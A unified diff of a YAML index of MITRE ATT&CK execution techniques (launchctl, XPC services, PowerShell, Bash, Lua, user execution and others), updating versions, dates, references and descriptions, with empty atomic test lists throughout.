         Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)
@@ -25602,39 +25910,13 @@ execution:
         url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1609
     atomic_tests: []
   T1569.001:
     technique:
-      x_mitre_platforms:
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
-      type: attack-pattern
-      created: '2020-03-10T18:26:56.187Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1569.001
-        url: https://attack.mitre.org/techniques/T1569/001
-      - source_name: Launchctl Man
-        url: https://ss64.com/osx/launchctl.html
-        description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
-      - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
-        description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
-          Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
-        source_name: Sofacy Komplex Trojan
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-20T20:14:35.179Z'
       name: 'System Services: Launchctl'
       description: |
         Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
@@ -25643,6 +25925,7 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: "Every Launch Agent and Launch Daemon must have a corresponding
         plist file on disk which can be monitored. Monitor for recently modified or
         created plist files with a significant change to the executable path executed
@@ -25655,19 +25938,42 @@ execution:
         are potentially suspicious. \n\nWhen removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s
         or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure
         the services are unloaded prior to deleting plist files."
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
       - 'Service: Service Creation'
       - 'File: File Modification'
-      x_mitre_permissions_required:
-      - User
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
+      created: '2020-03-10T18:26:56.187Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1569/001
+        external_id: T1569.001
+      - source_name: Sofacy Komplex Trojan
+        description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
+          Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
+        url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      - source_name: Launchctl Man
+        description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
+        url: https://ss64.com/osx/launchctl.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1569.001
     atomic_tests: []
   T1059.008:
@@ -25710,7 +26016,7 @@ execution:
         data, modify startup configuration parameters to load malicious system software,
         or to disable security features or logging to avoid detection.(Citation: Cisco
         Synful Knock Evolution)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T20:28:09.848Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Network Device CLI
       x_mitre_detection: |-
@@ -25726,72 +26032,75 @@ execution:
       x_mitre_remote_support: true
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1559.003:
     technique:
-      x_mitre_platforms:
-      - macOS
+      modified: '2024-10-16T16:14:12.793Z'
+      name: XPC Services
+      description: |-
+        Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
+
+        Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_contributors:
+      - Csaba Fitzl @theevilbit of Kandji
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_contributors:
-      - Csaba Fitzl @theevilbit of Offensive Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Access'
+      x_mitre_remote_support: false
       type: attack-pattern
       id: attack-pattern--8252f135-ed26-4ce1-ae61-f26e94429a19
       created: '2021-10-12T06:45:36.763Z'
-      x_mitre_version: '1.0'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1559.003
         url: https://attack.mitre.org/techniques/T1559/003
+        external_id: T1559.003
       - source_name: creatingXPCservices
-        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
         description: Apple. (2016, September 9). Creating XPC Services. Retrieved
           April 19, 2022.
+        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
       - source_name: Designing Daemons Apple Dev
-        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
         description: Apple. (n.d.). Retrieved October 12, 2021.
+        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
       - source_name: CVMServer Vuln
-        url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
         description: 'Mickey Jin. (2021, June 3). CVE-2021-30724: CVMServer Vulnerability
           in macOS and iOS. Retrieved October 12, 2021.'
+        url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
       - source_name: Learn XPC Exploitation
-        url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
         description: Wojciech Reguła. (2020, June 29). Learn XPC exploitation. Retrieved
           October 12, 2021.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
-
-        Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: XPC Services
-      x_mitre_detection: ''
-      kill_chain_phases:
-      - phase_name: execution
-        kill_chain_name: mitre-attack
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Process: Process Access'
-      x_mitre_remote_support: false
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1204:
     technique:
-      modified: '2024-04-12T03:46:49.507Z'
+      modified: '2024-11-11T18:52:12.103Z'
       name: User Execution
       description: |-
         An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
 
         While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
 
-        Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary; running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s; or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204).(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+        Adversaries may also deceive users into performing actions such as:
+
+        * Enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary
+        * Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+        * Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)
+        * Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)
 
         For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)
       kill_chain_phases:
@@ -25799,7 +26108,11 @@ execution:
         phase_name: execution
       x_mitre_contributors:
       - Oleg Skulkin, Group-IB
-      - Goldstein Menachem
+      - Menachem Goldstein
+      - Harikrishnan Muthu, Cyble
+      - ReliaQuest
+      - Ale Houspanossian
+      - Fernando Bacchin
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
@@ -25814,7 +26127,7 @@ execution:
       - macOS
       - IaaS
       - Containers
-      x_mitre_version: '1.6'
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Instance: Instance Start'
       - 'File: File Creation'
@@ -25841,6 +26154,10 @@ execution:
         description: Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious
           Bookmarks. Retrieved January 2, 2024.
         url: https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/
+      - source_name: Reliaquest-execution
+        description: Reliaquest. (2024, May 31). New Execution Technique in ClearFake
+          Campaign. Retrieved August 2, 2024.
+        url: https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/
       - source_name: Telephone Attack Delivery
         description: 'Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November
           4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery.
@@ -25851,15 +26168,19 @@ execution:
           API forms and more to scam users in popular online game “Roblox”. Retrieved
           January 2, 2024.
         url: https://blog.talosintelligence.com/roblox-scam-overview/
+      - source_name: proofpoint-selfpwn
+        description: 'Tommy Madjar, Dusty Miller, Selena Larson. (2024, June 17).
+          From Clipboard to Compromise: A PowerShell Self-Pwn. Retrieved August 2,
+          2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1072:
     technique:
-      modified: '2024-04-12T03:40:37.954Z'
+      modified: '2024-09-25T20:49:37.227Z'
       name: Software Deployment Tools
       description: "Adversaries may gain access to and use centralized software suites
         installed within an enterprise to execute commands and move laterally through
@@ -25876,7 +26197,7 @@ execution:
         on cloud-hosted instances, as well as the execution of arbitrary commands
         on on-premises endpoints. For example, Microsoft Configuration Manager allows
         Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
-        joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+        joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
         AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
         to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
         Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -25924,7 +26245,7 @@ execution:
       - Windows
       - Network
       - SaaS
-      x_mitre_version: '3.0'
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Application Log: Application Log Content'
@@ -25957,12 +26278,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1072
     atomic_tests: []
   T1059.001:
     technique:
-      modified: '2024-03-01T18:01:37.575Z'
+      modified: '2024-10-15T16:39:13.228Z'
       name: 'Command and Scripting Interpreter: PowerShell'
       description: |-
         Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
@@ -26023,8 +26343,9 @@ execution:
           POWERSHELL LOGGING. Retrieved February 16, 2016.
         url: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
       - source_name: Github PSAttack
-        description: Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.
-        url: https://github.com/jaredhaight/PSAttack
+        description: Haight, J. (2016, April 21). PS>Attack. Retrieved September 27,
+          2024.
+        url: https://github.com/Exploit-install/PSAttack-1
       - source_name: inv_ps_attacks
         description: Hastings, M. (2014, July 16). Investigating PowerShell Attacks.
           Retrieved December 1, 2021.
@@ -26046,12 +26367,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.001
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -26129,14 +26449,13 @@ execution:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests: []
   T1059.004:
     technique:
-      modified: '2024-04-16T12:24:40.163Z'
+      modified: '2024-10-15T15:17:19.136Z'
       name: 'Command and Scripting Interpreter: Bash'
       description: |-
         Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
@@ -26194,36 +26513,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.004
     atomic_tests: []
   T1559:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
-      type: attack-pattern
-      created: '2020-02-12T14:08:48.689Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1559
-        url: https://attack.mitre.org/techniques/T1559
-      - source_name: Linux IPC
-        url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
-        description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
-          March 11, 2022.
-      - source_name: Fireeye Hunting COM June 2019
-        url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
-        description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
-          10, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-10T19:06:35.666Z'
       name: Inter-Process Communication
       description: "Adversaries may abuse inter-process communication (IPC) mechanisms
         for local code or command execution. IPC is typically used by processes to
@@ -26244,25 +26538,110 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries,
         or spawned processes that are associated with abuse of IPC mechanisms.
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
       - 'Script: Script Execution'
       - 'Process: Process Access'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      - SYSTEM
       x_mitre_remote_support: true
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
+      created: '2020-02-12T14:08:48.689Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1559
+        external_id: T1559
+      - source_name: Fireeye Hunting COM June 2019
+        description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
+          10, 2019.
+        url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
+      - source_name: Linux IPC
+        description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
+          March 11, 2022.
+        url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1559
     atomic_tests: []
+  T1059.011:
+    technique:
+      modified: '2024-10-01T15:19:54.163Z'
+      name: Lua
+      description: |-
+        Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (<code>.lua</code>), or from Lua-embedded programs (through the <code>struct lua_State</code>).(Citation: Lua main page)(Citation: Lua state)
+
+        Lua scripts may be executed by adversaries for malicious purposes. Adversaries may incorporate, abuse, or replace existing Lua interpreters to allow for malicious Lua command execution at runtime.(Citation: PoetRat Lua)(Citation: Lua Proofpoint Sunseed)(Citation: Cyphort EvilBunny)(Citation: Kaspersky Lua)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Script: Script Execution'
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--afddee82-3385-4682-ad90-eeced33f2d07
+      created: '2024-08-05T18:19:42.201Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1059/011
+        external_id: T1059.011
+      - source_name: Kaspersky Lua
+        description: Global Research and Analysis Team. (2016, August 9). The ProjectSauron
+          APT. Retrieved August 5, 2024.
+        url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf
+      - source_name: Lua main page
+        description: Lua. (2024, June 25). Getting started. Retrieved August 5, 2024.
+        url: https://www.lua.org/start.html
+      - source_name: Lua state
+        description: Lua. (n.d.). lua_State. Retrieved August 5, 2024.
+        url: https://pgl.yoyo.org/luai/i/lua_State
+      - source_name: Cyphort EvilBunny
+        description: 'Marschalek, Marion. (2014, December 16). EvilBunny: Malware
+          Instrumented By Lua. Retrieved August 5, 2024.'
+        url: https://web.archive.org/web/20150311013500/http:/www.cyphort.com/evilbunny-malware-instrumented-lua/
+      - source_name: PoetRat Lua
+        description: 'Mercer, Warren. (2020, October 6). PoetRAT: Malware targeting
+          public and private sector in Azerbaijan evolves. Retrieved August 5, 2024.'
+        url: https://blog.talosintelligence.com/poetrat-update/
+      - source_name: Lua Proofpoint Sunseed
+        description: 'Raggi, Michael. Cass, Zydeca. The Proofpoint Threat Research
+          Team.. (2022, March 1). Asylum Ambuscade: State Actor Uses Lua-based Sunseed
+          Malware to Target European Governments and Refugee Movement. Retrieved August
+          5, 2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1204.003:
     technique:
       x_mitre_platforms:
@@ -26291,7 +26670,7 @@ execution:
         url: https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation
         description: Team Nautilus. (2021, June). Attacks in the Wild on the Container
           Supply Chain and Infrastructure. Retrieved August 26, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-26T16:42:35.318Z'
       name: 'User Execution: Malicious Image'
       description: |-
         Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
@@ -26318,30 +26697,12 @@ execution:
       - 'Instance: Instance Creation'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1204.003
     atomic_tests: []
   T1203:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - Windows
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
-      created: '2018-04-18T17:59:24.739Z'
-      x_mitre_version: '1.4'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1203
-        url: https://attack.mitre.org/techniques/T1203
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:34:23.908Z'
+      name: Exploitation for Client Execution
       description: |-
         Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
 
@@ -26358,9 +26719,10 @@ execution:
         ### Common Third-party Applications
 
         Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Exploitation for Client Execution
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Detecting software exploitation may be difficult depending
         on the tools available. Also look for behavior on the endpoint system that
         might indicate successful compromise, such as abnormal behavior of the browser
@@ -26368,21 +26730,37 @@ execution:
         evidence of [Process Injection](https://attack.mitre.org/techniques/T1055)
         for attempts to hide execution, evidence of Discovery, or other unusual network
         traffic that may indicate additional tools transferred to the system.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: execution
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
+      - 'File: File Modification'
       - 'Application Log: Application Log Content'
+      - 'Network Traffic: Network Traffic Flow'
